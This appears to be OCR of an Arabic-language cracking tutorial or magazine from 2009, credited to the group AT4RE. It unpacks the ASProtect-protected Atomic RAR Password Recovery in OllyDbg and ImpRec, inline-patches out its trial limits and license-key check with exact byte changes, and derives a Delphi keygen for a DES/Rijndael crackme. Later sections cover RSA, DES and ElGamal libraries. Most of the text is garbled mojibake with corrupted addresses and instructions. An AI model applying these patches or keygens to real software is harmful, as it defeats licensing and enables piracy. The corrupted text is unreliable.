Y|Conditional pause: eip == BA49787 
GetRegistrationInformation 0041420 
5| INT3 command at _00A47206 
Breakpoint at A ca1a 
¡¡Breakpoint at 004462 

Hardware breakpoint E at 00A478A4 
E|Breakpoint at B0BBO21B 
"D9| Breakpoint at 00A3S87D9 
ElBreakpoint at BBA3SMA3E 
2|[Breakpoint at BBASBAF2 
330| Breakpoint BBA30030 
Address of IAT = 60415008 
RUA of IAT = 00015000 
Size of IAT = BBBBBZFS 
3|Breakpoint at 00430079 

Address of DEP = MB413C32 
RUA_of OEP = MBB13C32 


VE YE 1% ¿boya JA OEP e Imports 3L* óLUa, 
Get 1 jar alga aj Size of RVA of RVAOfOEP +,3 ¿Ed Usd ImpRec 0 
lAT5> IAT 5 
Imports 


147 Infos needed 


DEP fr 000138032 _lAT AutoSearch | AutoSearch _lAT AutoSearch | 
RAYA [0001 5000 Size [DODOD2F8 


Load Tree | Save Tree | Get Imports [ 


all abi Qe ql 3) de_AtomicRarPasswordRecovery.exe lá2 ss Fix Dump ¿> vi 339 Ó 
í ** A 


de_AtomicRarPasswordRecovery_.exe Ed 15 


abi 9 U cda do lll 2009 Gra hH—— 


ld los aaa Ives ago: ATARE Mis le m UT we clveda. ct 


7 A IA 


Fix Dump [ 


A) AtomicRarPasswordRecovery_.exe 33 Só cd 
$ de_AtomicRarPasswordRecovery_.exe 


ASCHU “To find passwords witch have a dynamic part 


longer than 3 characters in ...” ASCIH “To crack more 


than 9 filas cimultanenmely 10m mmict reoicter onfturare” 


ASCUH “Sorry, this file can't be cracked with already 


placed ones simultanecusly” 


w74 22 JE SHORT de_Atomi.1B0401881 
+. 2801 SUB EAX,ECX 
. 83F8_03 [my] ne EAX», 
w?7 1B ALSHORT de_Atomi 60401881 
l- 68 Cos34100 | PUSH de_Atomi. 90415300 ASCII "To find passwords which have a 


¿E SHORT deAtoni 00403018 
CMP_WORD PTR DS:[4250701,2 
SHORT _de_Atomi. B8492FDD 


" v74 47 
l. _£6:833D 78504 
PUSH de_Atomi.00415728 ASCII "To crack more than 2 files sim 


l. “68 28574100 


JNZ SHORT de_Atomi.00492FF 

cHP vorO PTR DS: [425DB8], a 
T de_Atomi. an4a2FFA 

PUSH de aroni e04iecco 


“0375 14 

l. ES 333D B25D4 
l. “68 EOs64100 
, 


ASCII "To use more than 2 dictionary f 


UTA IV pa 


w74 17 JE SHORT de Atomi. 00404734 
. 53 PUSH EBX lParanm as B 
. 53 PUSH EBX wParam => 8 
. E? PUSH EDI Message => MSG(1004) 
+. FF35 E05D4200 PUSH DWORD PTR DS: [425DE0] hlind = NULL 
+. FFD6 CALI a SendMessageA 
+. 83F3 02 ES EAX 
w?F 07 JG SHORT de_Atomi.00404734 
|. 68 EOS64100  |PUSH pil Atomi. 00415650 ASCII "To use more than 2 dictionary fil. 


ASCII “Sorry, this file can't be cracked with already 


| v74 06 JE SHORT omi. 00406843 , : 
1]. 88 54504100 MOV EAX,de_Atomi.0M415D54 ASCII "Fully functional version” 


Ad 0%) es o E sa e, o i ñ Í a . 4 
Free 6j 2 BO qe dp dd e Os Sy Js Fully Functional version 0 


E 
evaluation version 


v74 06 JE SHORT de_Atoni.B0406843 | 
|. 63 54504100 /MOU EAX,de_Atomi.B0415D54 ASCII "Fully functional version” 


abi 0 U calado lll 2009 412 H—— 


lg lus vaa Ives ago: ATARE Mis 1 a NT lvl 


dutablo dat il: Fully ATARE/heKCErby 


31901003 
by ATARE/heKCEr Fully : 5 Free evaluation versiontaJ¿ggS db ús 5 


v74 06 JE SHORT de_Atoni. 00406843 
|- Bs 54504100 |MOU EAX,de_Atomi.00415D54 ASCII "Fully by AT4REsheKCEr  ” 


Jódar ja el Jonás Mingo ata 


Sra 


|ASCIIT "Sorry, this file can't be cracked with already placed ones simultaneous ly” 


abiós jas ¿ a 


bas 30 LoS e o00404FEF usó 


Di a 
| |'UNZ SHORT de_Atomi . 89495910 
1 A A ha MARA TA AA PA AA 


E AN 
IMédaL.. rpc.exez3321 63 3 AtomicRarPasswordRecovery.exe 2) 183 VUE ga 


¿o dies Project-27 de a +alllis « AtomicRarPasswordRecovery.exe “2 yal 3rpc.exe AN 
Cub 


abri rpc.exe eee 1 Var ala 010 


set O ¡E ES QQ, 
A A a CU: 


rpc.exe Properties 


[General | Version | Compatibilty | Summary | 


General | Version | Compatibility | Summary 


Ey |AtomicRarPasswordRecovery.exe E 


Type of file: — Application 


rpc.exe 


Type of file: licati 
Description: RAR password recovery software E o 
Description: RAR password recovery software 
Location: CxProgram Files Atomic RAR Password Recovery 
Size: 197 KB (201,728 bytes) 


Size on disk: 200 KB (204,800 bytes) 


Location: CA Program Files Atomic RAR Password Recovery 
Size: 197 KB (201,728 bytes) 
Size on disk: 200 KB (204,800 bytes) 


¿90 pay 05 ya Spa Eliza 


Fo dub, JAbO 39 2d 986 Patching Inline ¿25 due gis 


aby ly Udo lll 2009 (E DE 


lag lus aaa Ives ago: ATARE 3 $ id a Je E lvl. 


a ón EProject New 


de E bil opte Patan e gdadda ¿ed ada E zoO 
¿5»3CompareFilesTabk :)óEs( eS lbs e 9232 Target File Tab 02134 y Offset Patch 
File Original ze AS LO Yalál ¿Uk So 


dise ss File Patched ¿ e abla bil atole 
Compare ss: 


A II 
Má save lv 


Eo. boa Ab A IA dE 
E a co ree Ra go, 
Las Jade y AtomicRarPasswordRecovery.exe 


Target File 
File: pc.exe Casa] 
Did Filesize | 00031400 New Filesize | o00so0000 ; 
(2) Normal File 
CRC32: DA3F2FB2 enable CRC32 check 


O Virtualáddress Mode [PE file] 
[1] don't check original (old) bytes [] Try patching used file 


Compare Files 


Original File: C:XProgram Filestátomic RAR Password Recoveryipc.exe Ca) 
ompare 


Patched File: C:AProgram Filestátomic RAR Password RecoveryiFinal_Patched_one.ex Ca 
al ¡Add and Edit 


RAN Offset Old Byte New Byte Off 
00000136 07 09 Ca | Uliest 
00000158 00 32 Driginal Byte 
00000159 10 3C Paichod Bula 
0000015A 00 01 
0000016D 02 10 
00000181 co 00 
00000182 04 05 [ Clear List ] 
O o0oeznr == > MemCheck [for Loaders] 
000001B2 03 04 E E) 
A cs DC Memoryádress: 
000001B5 02 00 
000001DO Dc 00 Memory alue: 
000001D1 09 00 
000001D2 03 00 (un) dl 
000001D4 08 00 | [Down] 2392462 


a y y da lll 2009 


Y 


ld log as amoo loe agz: ATARE Mis ¡de NT wie. 


Y Tera DS DS s Patch Create 3 a! qu os : ¿Ouabo, 


ASProtect SKE Inline Patchinger 0.2 ¿2300203 ¿q Inline Patching 4* )¿góuó 


ya 2 ualya yy opa ds ji 


> d : > J ' 


“To crack more than 2 files simultaneously you must register 1 Siro zoe ¿asia ql 
software” the GolV yu ¿ve ua: 


PUSH EBX lParam 

PUSH EAX wParam 

PUSH 1013 Message = MSG(1013) 
PUSH DWORD PTR DS: [425FF9] hlind = NULL 


MOV DWORD PTR DS: [425F44] EAX 
NEAR DWORD PTR DS: [xGuser32. SendMeszagei>] SendMessagei 

CMP BYTE PTR DS: [425410], BL 

PUSH 3 

POP EDI 


CHP WORD PTR DS: [425C70],2 
PuSsH ASCIT "To crack more than 2 files simaltanesously y 


MOV AL,BYTE PTR DS: [426014] 
TEST AL,1 


CMP WORD PTE DS: [425DB8],2 


PUSH AiSCcIT "To use more than 2 dictionary files you mas 


TEST AL,2 


CMP DWORD PTR DS: [426040] EDI 


PUSE ¿sScIT “To find passvords which have a dynsmic part 


MOV EAX,DWORD PTR DS: [425074] 


gir esco 00402FBE 
e FRA Dd de dd CAD dde do 


EY co bajó su O ETT 45425AA0 


olas jon oro oo cia y 


aby ly Uca do lll 2009 Grs => 


lg los aaa Ives ago: ATARE Mis E m UT clear. t 


. 3 


5 


“ 


30 A0Uiz ode 33 Limitation 94 


5 CES E 3 50% Cagh ao 
¿caja ld ro zo 425Am0 ge gasólo dez bcioó ¿uds 


Ad 


¿6W KEYISNOTCOMPATIBLE 


D0406C81|]. 833D 54584200 FF |[|CMP DWORD PTR DS: [425854],-1 
0o0406C88 || ... 74 2E 'JE SHORT _AtomicR.00406CE3 
D0406C8A|] . | 68 B45E4100 PUSH _AtomicR.00415EB4 2 = "REYISNOTCOMPATIBLE" 
3 68 A05A4200 PUSH _12 104 y [2 ra 
ES 81CF0000 JMP. amsvecr”?l.strcmp strcmp 
85c0 TEST EAX,EAX 
59 POP ECX 
(59 POP ECX 
-v| 75 19 SHOR 
68 385F4100 PUSH ASCII "Your license key is 
68 OC5F4100 PUSH _2% ASCII "RAR Password Cracker 
6A 10 PUSH 10 
ES 36FDFFFF CALL _AtomicR. 0040696 
8304 oc ADD ESP,OC 
33 ||. |8308 FF OR EAX,FFFFFFFF 
O0406CB6|] ..| EB 46 
0040 ; 241 205B4200 MOV EAX,DWORD PTR DS: [425B20] 
DO406CBD!. 85C0 TEST EAX.EAX 


3 
¿* 


Go cash o 32040501,043,425AA0 ORI da 30 dpto ge jalea ¿ió y ¿ja de 


MOV tai InlinePatch ls? rro ee gO0A06C88 ls ise jo 1) 193425440 »e Ej3Uz! 


» 


DS:[425AA0],1 PTROWORD 22d dos ¿eudarvallasadá e gol Jnó: 


PATCH = MOVDWORD PTR DS:[425AA0],1 
RVA = 6C88 
BYTES = 742E68B4 


00406€C 


MORAN 


3/74 ZE 68 B4|5E 41 00 68/40 54 42 OO|ES 81 CF 00/t.h'"A4.h ZB.8J/. 


na ar a ralra ar 1 ralan re a nmalra ar rr an 


nar 


AA 2 


: ASProtectSKE InlinePatchinger¿sg230) 22294 


a ly e dao lll 2009 


lid logs a loe Sas E: ATARE Mis ¡de UT E LA 


ASProtect SKE Inline Patcher v0.2 by tenketsu00D1 7 E” X 


ASPROTECT SHE 


FOR WINDOWS 3=/38/ME/NMT4/2000/XP/2003 


CiiProgran FilesvAtonic RAR Passuord RecoverutAtonicRarPassuordRecovery. exe ——— CJ 
—— 2) Metodo? O) Metodo 2 RWA: 6088 Bytes: 74ZEG8BA y 


Esperando... 


C:WProgran FilesiAtonic RAR Passuord Recovery iAtonicRarPassuordRecovery.exe 
[Xx] AsProtect SKE 2.x detectado [EXE] - Signature Butes 


cía ¿aja ii ia ai dl salí pásalo > Asprotectas ¿e se Patch ; 
ASProtect SKE Inline Patcher v0.2 by tenketsu001 7 


Ed ASPROTECT SHE 


FOR WINDOWS 3=/98/ME/MT54/2000/XP/2003 


CiWProgran FilesiAtonic RAR Passuord RecoverytAtonicRarPassuordRecovery.exe Lia 
() Method1 O Method 2 AWA; 6088 Bytes: 742E69B4 


¿nd sei jad ¿a Patcher  OllyDbgue“W) AtomicRarPasswordRecovery.exe 5hi dl ¿ó 


o ropas de roo das qe ds 00406088 as yg Jia Fs ¿pá 
¿soja pa EcioóLó ne 53 MOV DWORD PTRDS:[425AA0],1 : ¿Ge 


14 


Sotveld: Sd ¿gabo Lt YN 


dilo ctasrue pr NOP 30 


all ly 0 cado lll 2009 1) —— 


las leg as yz Ives oasz: ATARE 


00440402 
00440403 
00440404 
D044C40A 
0044C40B 
00440411 
D044C417 
0044C41C 
D044C41E 
0044C41F 
DO044C420 
D044C421 
DO44C4 
00440423 
00440424 
0044C425 
D044C426 
0044C427 
D0044C4 
D044C429 
DO44C42A 


0044C42B 
D044C42C 
D0044C42D 
D044C42E 
0044C42F 
0044C430 
D0044C4 
DO44C4 
0044C4 


D044C42: 
0044C4 
0D44C 


Mis 1 A Ud A LT 


9D POPFD 
6l POPAD 
FF35 DOCD440( PUSH DWORD PTR DS: [44CDDO] 
c3 
FF35 00014430 PUSH DWORD PTR DS: [<¿kernel32.GCetModulef kernel32.CetModuleHandleA 
FF15 id NEAR DWORD PTR DS: [44CDE8] AtomicRa.0044C01A 
837024 28 00 P ¿0 
75 B? 
30 NOP 
90 NOP 
90 NOP 
30 NOP 
30 NOP 
90 NOP 
20 NOP 
30 NOP 
30 NOP 
390 NOP 
90 NOP 
90 NOP 
30 NOP 
90 NOP 
30 NOP 
30 NOP 
30 NOP 
90 NOP 
9D POPFD 
6l POPAD 
FF35 0004430 PUSH DWORD PTR DS: [<¿kernel32.GetModulel kernel32.GetModuleHandleA 
Cc3 
2 sí. q 
: NOP 2335) MOVDWORD PTR DS:[425AA0],1 ¿lá a 358 3 ¿ón 
ULU44U41U]| - 75 BY UNE S5Hu ATOMICHA. UU44 
0044C41E C705 A05A4420( MOV DWORD PTR DS: [425440],1 
00440428 . 390 Lay 
30 NOP 
90 NOP 
7 30 NOP 
0044C42C]| . 90 NOP 
0044C42D| . 90 NOP 
0O0O44C42E| . 90 NOP 
0044C42F| . 20 NOP 
0044C430| . 9D POPFD 
D0O44C431| . 6l POPAD 


da Sus za Patchinginline * 


A TIN 


* 


ri 


MOV DWORD PTR DS:[425AA0],1 


2009 


lag los aaa Ives ago: ATARE 3 $ id m Je e lvl c 


dpto ai qa paja at dl dió do ¡js lo 


Pes 


00406CB8 = Al => C7 
00406CB9 = 20 => 05 
00406CBA = 5B => AO 
00406CBB = 42 => 5A 
00406CBC = 00 => 42 
00406CBD = 85 => 00 
00406CBE = CO => 01 
00406CBF = 74 => 00 
00406cCcC0 = 15 => 00 
00406ccC1 = 68 => 00 
00406cCcC2 = 00 => 90 
00406CC3 = 5A => 90 
00406CC4 = 42 => 90 
00406CcC5 = 00 => 90 


baso ¿uoaá us de setos equ ¿ea + ¿usada ¿o )Patched( 


¿eel Ds DUP: 


Offset Patchdata 


Target File 
MER tomicRarPasswordRecovery. exe: bed 
Old Filesize | 00031400 New Filesize 


5 Nora 


cAc32 | : 
sl ieneba cnt Sas (O Virtualáddress Mode [PE file] 


[1] don't check original (old) bytes [-] Try patching used file 


Compare Files 
Driginal File: | mo 
Patched File: O Compare 


¿dr is OS dada id dao se EY Editand Add ¿IV Ó E e óImode VirtualAddress sal: 
ds "ayala tb ge jej Create loader Save 


erat olga cds 


/. patcher dup 


q -.dup 


a ly el dao lll 2009 


las leg as yz Ives gasz: ATARE ly y O] lodirloedonz 


introduction to Cryptology 


260% ya m ¿ota 3 yaya ¿el Y, AS a baya ld EN yz q 0d HEZOGA, 


3 


OLEO Ei qua 


y aby ais e o IC Jl 

92 Me 1d el pl joo 

)3 5,1830) o jo? OllyDbg 
A dgda y) juas als ll YN 


> 


)5 ios Us 


AS 


Jya corola 4% dl y ¿QUO ja poa Ad ja ya a ¿ami ya e 00 CRUIAUa q vdd co de gr 


, e ebro O 
AT) 


A lo ds: 


300 mall po ata ya diz Ea aa, y dc j: 


) Decryption gaby ayas: dsg ly ¿ou ( Encryption | 


ai ly Uca lps 2009 (21) — 


NTC DE amd lveSgasz: ATARE ly yd IA laca 


A AO 
RSA, DES, Mars, Blowfish 544650: 


isis ásly joe e lablyar + 3: Force Brute 


xx 


jodo ej 


El q tulo A 2 atajo Pp ls e Jl da 
Loto, 


.Q 


MD4,MD5,SHA, Haval : aj4a 3 


áligaja ¿db ra 


Virosozis. be 


daa ¿rol ocu só al de 


EI RE 


sdlajados lina pol ajo, HN call ¿spa sil la ja oleadas 

DES ésuiéstó Hello Hue pise ¿Usas gua dy 

123 Hello, ¿iwapiialyibica Só DES ús jESi sóc 
¿pascal ¿e ds jjaja de: 

EnCryptString (Hello, 123 ) 


hos 
- DUO 


Hello 31234, Ju a jo ¿al rl dE EnCryptString p0sió sz, 


e ua PSA al dijo del lo lija ino doy ¿tl dojo pas 
RSA.Cls 35 RSA.bas : 
RSA.asm : Assembly - 


Visual Basic 6 - 


a ay ul ao lll 


las leg as yz Ives sz: ATARE o aa WweclelVrs e 


RSA.pas : Delphi - 


RSA.inc : C, C++ - 


có A o ¿Lía O Íyas ru Cea MN] As A ss eva DLL gon al IÓ Hua (e 
.Export Tables 


4 Et laa sigas sl d) galo Ey Cal y ¿lia gr lean 


A EA ¿90 Bus al OS 
cule duo dalla yy0DES pelear galos dales ds: 


Function EncryStr (Str, Key: String): String; 
s 4 


y 


EncryStr:3 pzas je ico yaya yadal guasa y00 ya, 


Str : ¿biaja log boli 


String Key : glead ¿eo az du qe Eos) Ego, 


String: 3% 30 24 daga ro 
2 all yáóóa o Hello lea 3 ly RobenEDHS6 351) ¿sido ¿360 Textl de: 


Textl.Text := EncryStr ( Hello , RobenEDH56 ) ; 


Had dali: dol) aires 


ales: 


Procedure RSAEncrypt (P : String; Var exp, modb : TFGInt; Var E : String( ; 


Ely ras JE BRSA ls 3 pla 0 yy ja ro aid yy 


Za 


¿Sálo :TFCInt: modb 


IS 
Hao) liso gráliaggo, Jl nit 


abi 9 U cada ll pal 2009 ( 123 H— 


las leg as yz Ives oasz: ATARE ly DOS | Gs) laredo? 


Y eri de sola 


JA ¿ua llo o o qa Es ca 


3) y gya Ub di os 


$) 0 A QÑ 3 ASEl haya ja Y Loy ¿baya de yl Y Logo, Ens CE) 5 alles den 


Et 


A OS 


Uses Delphi 


ado 61.4, ¿lia aye Des.pas : 


uses 
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, 
Dialogs, Des, StdCtrls; 


G. Lg ira Des.bas 5921 Des.Cls 13%: Visual Basic 6 
yá bordo is: : Assembly 


.386 

.model flat, stdcall ¡32 bit memory model 
option casemap :none ¡Case sensitive 
include Des.asm 


.code 


:ó Kanal PEID 93Jo 0 Abibosie gira Jud 


$. 
ad lvadelphi ¿Os 970€. O 
Sado a el 
. DES € 


. Riindael € 


ai ly Uca lps 2009 (24) 


las leg as az Ives gasz: ATARE ly yd $ —_—_—_—_—__——- ) ES EA 


. BigNumber € 


File: C:iDocuments and Settings|PC|Desktop|Robde% 


Entrypoint: [00054340 File C:¡Documents and Settings1PC|DesktopiRober 


+ DES [pbox] [char] :: 000546DC :: 00455EDC 
File Offset: 00053740 Y + RINDAEL[S] [char] :: 00054B74 :; 00456374 
-4Big number? :: 00053460 :: 00454060 


Linker Info: 2.25. 
da ll 43 


Borland Delphi 6.0 - 7.0 E — > di ón neal! CióSal) 
[Al] Stay on top - : 
ápout Export.) (_gose_) 


Detected 3 crypto signatures (in 0,4s) 


GO Ae ade dee ceo ld plo y ps diia ¿da ¿dedos Sy ptas Jotas DEDE Ys 
yo e 


eb uo dd rod ys ¿usa MKEYChange 


rare 


| Event RYA Hirt 
| ImagelMouseD own 00453D80 0016 
ImagelMouseMove 00453D 98 0016 
imaMinimizeClick DO453DEC 0017 
BTCloseClick D0453DFC 0013 
MKEYKeyPress 00453804 0013 


¡EormCreal DO453E2C 0011 


[Marea] a 


der js Dog sá gala ii: 


For Elite Only ... 


Serial : [1234567890 


j Result- UnRegistered ] 


E i 
i [ RMubhne -  Anhanlnandirah Mate - ME 1IN LANA | E 


STR SSEUO0453E7 ae js ass o duaaldés MKEYChange 


dead! ds. o) qt Mia ELA: 


ai ls Uca lps 2009 ( 125 H— 


lis logs aa loe gc: ATARE ly y y lucido ct 


00453E74 PUSH EBP ee 
00453E95 LEA EDX, [LOCAL.9] 

00453E98 MOV EAX, DWORD PTR 

DS: [EBX+2FC] 

00453E9E CALL 0043138C 

00453EA3 CMP [LOCAL.9], 0 alga tae q Al 
00453EA7 JE 00453FE2 

00453EAD LEA EDX, [LOCAL.10] 

00453EB0 MOV EAX, DWORD PTR 

DS: [EBX+30C] 

00453EB6 CALL 0043138C 

00453EBB CMP [LOCAL.10], 0 ¿yo lili, al 
00453EBF JE 00453FE2 

00453EC5 EA EAX, [LOCAL.7] 

00453EC8 CALL 00403E88 

00453ECD EA EAX, [LOCAL.1 


00 dsd qyod póg da du ales puely duos e DES 


ar Ósa LE ja id Eulg oro Me da haya 


00453EDO MOV EDX, 454034 ; ASCII "RobenCrackMelForElite01" 
00453ED5 CALL 00403F20 

00453EDA LEA EDX, [LOCAL.11] 

00453EDD MOV EAX, DWORD PTR 

DS us 210 1 

00453EE3 CALL 0043138€ 

00453EE8 MOV EAX, [LOCAL.11] ds dez y ¿ls ad 
00453EEB LEA EDX, [LOCAL. 6] 


do 3logie : ds? rasos 3% a Hex 


O0453EEE CALL 00453CEC e cueolállyy lo ligas: 
[Roben]  =R[52] + o[6F] + b[62] + e[65] 
=526F6265 


abi 0 U cada do lla pat 2009 


lid log aa loe ago: ATARE Po A lodicluedors e 


e sscar cor ó ne UV adm: 


00453D27 LEA ECX, [ 1-3] < Loop : Convert Name Letters To Hex 
00453DZA MOV EAX, [ 5:13 >>>> Nithout Last Letter 


00453EF3 LEA ECX, [LOCAL.5] 

sn dez y, ablcyó 
00453EF6 MOV EDX, [LOCAL.1] cia 7 
00453EF9 MOV EAX, [LOCAL.6] a a le shex az yal ¿las 


00453EFC CALL 004527AC E e Lo; me aya ¿ost DES 


¡ampli 5 (Base64)64 olivas dues dos dog ol DES ¿gc 


AMES ras) 


00453F01 EA EAX, [LOCAL.5] 
00453F04 MOV EDX, 454054 
00453F09 CALL 00404150 
00453F0E LEA EAX, [LOCAL.2] 
a ds dy aleaj ásly ¿li jose Rijndael 
30m 5la: dea "Gral ¿OOO? gozo ns EópÓnos 
Aaa 
qué, 
; ASCII 

00453F11 MOV EDX, 454060 


"6184AFOOCDO9FA7F73F41D310D1FF48D" 


ai ly Uca Ulea 2009 ( 127 == 


is lees umd lle Scagz: ATARE A) words 


00453F16 CALL 00403F20 
00453F1B LEA EDX, [LOCAL.8] 
00453F1E MOV EAX, DWORD PTR 
DS: [EBX+30C] 

00453F24 CALL 0043138€C 
00453F29 LEA EDX, [LOCAL.14] 
00453F2C MOV EAX, [LOCAL.5] 


dde pis pátaya DES: 2h go ¿md Base 


64 93d poes 


00453F2F CALL 00453CEC 


00453DZD 


ego AU aaa 


UI 2 7D242D9FCBBO3FF7 : (só baso > 


JOEA4D30]=7D (' 
JOEA4D30 


ASCII 


SND : éguójoy  526F6265 :yadaóy O 


Input ¿ica ci Reverser Tool 


aj DES ¿ri O 
RobenCrackMe1ForElite01 
Option «+ xx UPPERCASESE E O 


all ly 00 ¿Ja llo pst 2009 


le lia. amd lveSgasz: ATARE ly yd IA) ES EA 


00453F34 MOV EAX, [LOCAL.14] 
00453F37 EA EDX, [LOCAL.13] 
00453F3A (CAT 0040797C 

00453F3F MOV EAX, [LOCAL.13] 
00453F42 EA ECX, [LOCAL.12] 
00453F45 MOV EDX, [LOCAL.2] 


ig0aya 7D242D9FCBBO3FF7 —: pisó 
Rijndael ¿225 


00453F48 CALL 00453828 


00453F4D MOV EAX, [LOCAL.12] 
00453F50 EA EDX, [LOCAL.3] 
00453F53 CALL 004529C8 
00453F58 EA 10%, [Moca 18] 
00453F5B MOV ED MO CAMARA 
00453F5E MOV EAX, [LOCAL.8] 
00453F61 CALL 00453828 Elyátoyo : ad qe aby (1234567890) 12: aya els Rijndael 
00453F66 MOV EAX, [LOCAL.15] 
00453F69 LEA EDX, [LOCAL.4] 
00453F6C CALL 004529C8 
00453F71 MOV EAX, [LOCAL. 3] 
00453F74 MOV EDX, [LOCAL.4] 
00453F77 CALL 00404294 be js pls ¿uelyós oa a Rijndeal 
00 Sol y 1 3941007 pyálómal y6= plas Hex+ Des 
AE) blo a ue Rijndeal TY) dl! y ¿O dd Ll aó ZE a o 
SA EN s¿02U0Rijndael y *L Srlo decada e apa da e y, [0] 
00453F7C JNZ SHORT 00453FBF ¿Aa aros 


28 dy 080 dado lbs 2009 


lg los aaa Ives ago: ATARE ly DOS | Gs _) lavados e 


00453F7E LEA ¡DP LOCAL 

00453F81 OV EAX, DWORD PTR DS: [EBX+2FC] 

00453F87 CALL 0043138C 

00453F8c OV ECX, [LOCAL.17 

00453F8F LEA EAX, LOCAL.16 

00453F92 OV EDX, 45408€C ; ASCII "Registered To : " 
00453F97 CALL 00404194 

00453F9C OV EDX, [LOCAL.16 

00453F9F OV EAX, DWORD PTR DS: [EBX+308] 

00453FA5 CALL 004313BC 

00453FAA OV EAX, DWORD PTR DS: [EBX+308] 

00453FBO OV EAX, DWORD PTR DS: [EAX+68] 

00453FB3 OV EDX, 8000 

00453FB8 CALL 0041C648 

00453FBD JMP SHORT 00453FE2 

00453FBF OV EDX, 4540A8 ¿ ASCII "UnRegistered" 


Sosa propa zoo 
1 9) 080 dis 305060 (Miro Y zea yy rurasós s.)Hex 
. RobenCrackMe1Forelite01 : ¿aclás ,¿ )2 Ely ¿bz ja paa DES 
3 2góS gli ail ys Hex 


JA cod, ¿Uli ¿Case Upper 


e a a ¿ik A? ee 
epi y ¿LOA 32 Juez 


de Te 


Procedure TForml.GetSerialClick(Sender: TObject); 
Var 
I :Integer ; 
UName,HexName, Key, StrDES, StrHEX: String; 
begin 
StrHEX:='"'"; 
UName := TXTName.text ; 


If Length(UName ) < 2 Then [ Jsulolayalil Jh ¿yu $ 
Begin 
TXTSerial.Text := ' Name Must Be >= 2 '; 


a y da lll 2009 


las leg as dz Ives gasz: ATARE o aaa wealelVs e 


Exit; 

End; 

For 1:=1 To ( Length (UName)-1 ) do 

Begin 

HexName:= HexName + IntToHex (Ord (UName[1]),2); ([syJilcswJllaclo 2ueyie ¿od gls ol aya Ji> 

J 

End; 

Key:= 'RobenCrackMelForElite01'; 

StrDES:= EncryStr( HexName, Key ); [ colgulgyasó ) 

For 1:=1 To Length(StrDES) do 

Begin 


E 


StrHex:= StrHex + IntToHex (Ord (StrDES[1]),2); [ Esó3 Hzollldióno $ 
End; 
TXTSerial.Text := UpperCase (StrHex); [Egusuol pllióno ] 

End; 


aio 0 U cada do lll 2009 (31 H— 


lg lus aaa Ives ago: ATARE ly yd E——_—— lodclvedorsz 


29 324 MJ 


El6Gamal Alsgorithm 


-= Ja 


$ dC al 32 a: 
)1 Ladiaaids 3 y) jurar ln Ls ElGamal 
py Cad a jad gldelios FGInt 
43) Us ¿¿UJ O hd? OllyDbg 


)5 ad ligas glo lid ll jo da pp, 


J6 Sia ls 


o] 


. Discrete algoritii problem €: Diffie-Hellman Problem :2€ eat .Scheme 


so 


IN TS O 
Digital Signatures alfabigsidos: 


5 poo de jols yes Scheme 
dog abosd joy roy se JO y rada A li y A, 


A e E] 
pi ja 


lg del as 20) de 


ai Uca lps 2009 ( 132 pS 


le leas amd lveSgasz: ATARE ly yd AAA EST EA 


E E IA 
yoo oh y ¿haya Loc é Lua 24 abbrid ¿va ( Public ) Abiya ( Private .) 


gurb jaicón ga: ias pS je dra 
ip) 
pe O RRA 
ac (A rs a) 55: Power. :) Y (04 
a rr) a Base. ¿6 (AM 
ablexi ¿ds ( pu) 3úya pavas a copo 10% ¿ón Ls ESturdo, ¿oca ) :)X( ya ji 


dd 400: Po Porrdo, ¿Soda 3 ¿bl JUVE oo d ¿90d eaboloja ve Loa ¿Lag É :)a,b (geá 4) 
.) X( ali E 


Ode isero Oral 305: Passphrase. :) K( 23 


CegdoWa a, cora flátó ros jrje igitaje ¿le 


bs 
lag doz ora ¿o Seo dÓ Y oa. 0 uo A leo 


Y=G”xX Mod P 


q 


ojeada E 12d [0] 
Dx veis 


joe alga roja sy tdallzs 


DLP Tool )Discrete Logarithm Problem ¿200328472 990" 


jarro glo go ll dl a 


aby ly 0 U calado ll pal 2009 (33 =— 


las leg as az Ives uasz: ATARE 


A lalo 


L* En Diga FGInt y Join (9 ic Ua abcd ya ds de 


y bógulo pj Loidnya LAR: 


3 Lo yA baya yO, EN Mi pa 3 


dal, gel 
o alla, a 2d k q 0) 
blo iba q, dl d) Dj ya: 10) 


FGInt.pas -— FGIntElGamal.pas -— FGIntPrimeGeneration.pas 


43hálja za aña Zn, 


ay $ 
dario 


¿e do ya ibyyas d Un do ayi ph a al saga do E ita. Y ve pa 


egin de je EA gal o (aliso galo AS AS 


soc abílsalls o jr JFGintPrimeGeneration, pas( A; Ó 


o) 


valia jua) ElGamal : ¿22395 


Pa 


». 


ase) ¿galle zo alijo 


Procedure ElGamalEncrypt (P : String; Var 9, y, k, modp : TFGInt; Var E : String); 
Procedure ElGamalDecrypt (E : String; Var x, p : TFGInt; Var D : String); 
Procedure ElGamalSign (M : String; Var p, 9, X, kX : TFGInt; Var a, b : String); 
Procedure ElGamalVerify (Var 9, y, P : TFGInt; a, b, M : String; Var ok : Boolean); 
ná O 
e és ¿uns ElGamalSign o 
ElGamalVerify 0) 
. a,b 
cele izolUónial Es ¿ce 3 ElGamalVerify 
IR és de E do 
ALIS E 30 d0S 7 ala ada: 
sl 3 a | O eN E JA US A o AR P 
do Pe TEO EA 1 ai AA Y, P 
KE 
* TFGInt 


A INS 


lg logs aaa Ives ago: ATARE ly yd E———— lalvedOz 


add a A * Po 1 Y E d A 5 st 
E E E E 
TFGInt « so UA Es 30tuja Eu ádo A eel FGInt.pas : 


Procedure ConvertBase256StringToHexString (Str256 : String; Var HexStr : String); (1) 
Procedure ConvertHexStringToBase256String (HexStr : String; Var Str256 : String); 12) 
Procedure Basel0StringToFGInt (Basel0 : String; Var FGInt : TFGInt); (3) 
do os Aaa do bi . no. 
y:2 hoc 2 casó jr 0i256 A 16 Ads yal1) 
'4TFGINt “¿2 (3) 


: ElGamal Verifys¿¿U zea O 


.) True, False(«) ly tur Ergo daras (ok) 
E 


Do dr ] ed lp A A 
A O EE 


ha E O ed ps E la a 
0 93 € ad EN] PEE Algo o SEA aa imac Anda, 06 1J % ¿False 


: FGInt£lGamal.pas Jiódg? ae ió Al añ O 
€ GUN ty 231 + ElGamalSign 
€ 


Procedure ElGamalSign(M : String; Var p, 9, X, k : TFGInt; Var a, b : String); 


FGIntToBase256String(templ, a); 


FGIntToBase256String(temp3, b); 
End; 


(PX O 7 que ió X 


¿0 do Y los ym ab ja 


da 3006 OO ie) ii 256 


ad: ad a go seta )sgós PEID 
Kanal O 
paro vaDelphi 46017 gt 39206. O 
IN O 


ai ly Uca lps 2009 35 H— 


las leg as az Ives sz: ATARE 


"E PEiD 10.94 


File: | C:Documents and Settings|P' 


Entrypoint: | ODOS61BC 


File Offset: DODS55BC 


Linker Info: 2,25 


